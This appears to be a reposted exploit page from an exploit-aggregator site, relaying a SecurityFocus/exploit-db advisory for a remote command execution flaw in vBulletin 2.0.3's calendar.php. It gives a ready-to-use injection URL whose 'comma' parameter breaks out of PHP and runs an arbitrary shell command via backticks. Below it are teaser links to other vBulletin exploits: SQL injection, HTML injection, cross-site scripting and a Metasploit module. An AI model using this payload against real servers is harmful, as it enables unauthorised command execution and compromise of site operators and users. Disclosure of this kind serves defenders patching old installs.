Home » Exploit » PHP » vBulletin » vBulletin 2.0.3 Calendar.PHP Command Execution Vulnerability

Monday, October 29, 2012

vBulletin 2.0.3 Calendar.PHP Command Execution Vulnerability

Source: http://www.securityfocus.com/bid/5820/info

A  remote command execution vulnerability has been reported for vBulletin.  The vulnerability is due to vBulletin failing to properly sanitize  user-supplied input from URI parameters.

An attacker can exploit this vulnerability to execute malicious commands on the vulnerable system.

http://www.example.com/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60<command>%20%60;die();echo%22

where <command> signifies a command to be executed on the system.

Nguồn: http://www.exploit-db.com/exploits/21874/

29 Oct 2012

Invision IP.Board <= 3.3.4 unserialize() PHP Code Execution
### This file is part of the Metasploit Framework and may be subject to# redistribution and commerci...Read more
vBulletin vBay <=1.1.9 Error-Based SQL Injection
#!/usr/bin/env python -W ignore::DeprecationWarning """ VBay <= 1.1.9 - Remote Error based S...Read more
vBulletin 3.0 Private Message HTML Injection Vulnerability
source: http://www.securityfocus.com/bid/7594/infoA vulnerability has been reported in vBulletin 3....Read more
vBulletin 2.2.7/2.2.8 HTML Injection Vulnerability
Source: http://www.securityfocus.com/bid/6337/infoProblems with vBulletin could make it possible for...Read more
vBulletin 2.2.7/2.2.8 HTML Injection Vulnerability
Source: http://www.securityfocus.com/bid/6337/infoProblems with vBulletin could make it possible for...Read more
vBulletin 2.0.x/2.2.x members2.php Cross Site Scripting Vulnerability
source: http://www.securityfocus.com/bid/6246/infoDue to insufficient sanitization of user supplied...Read more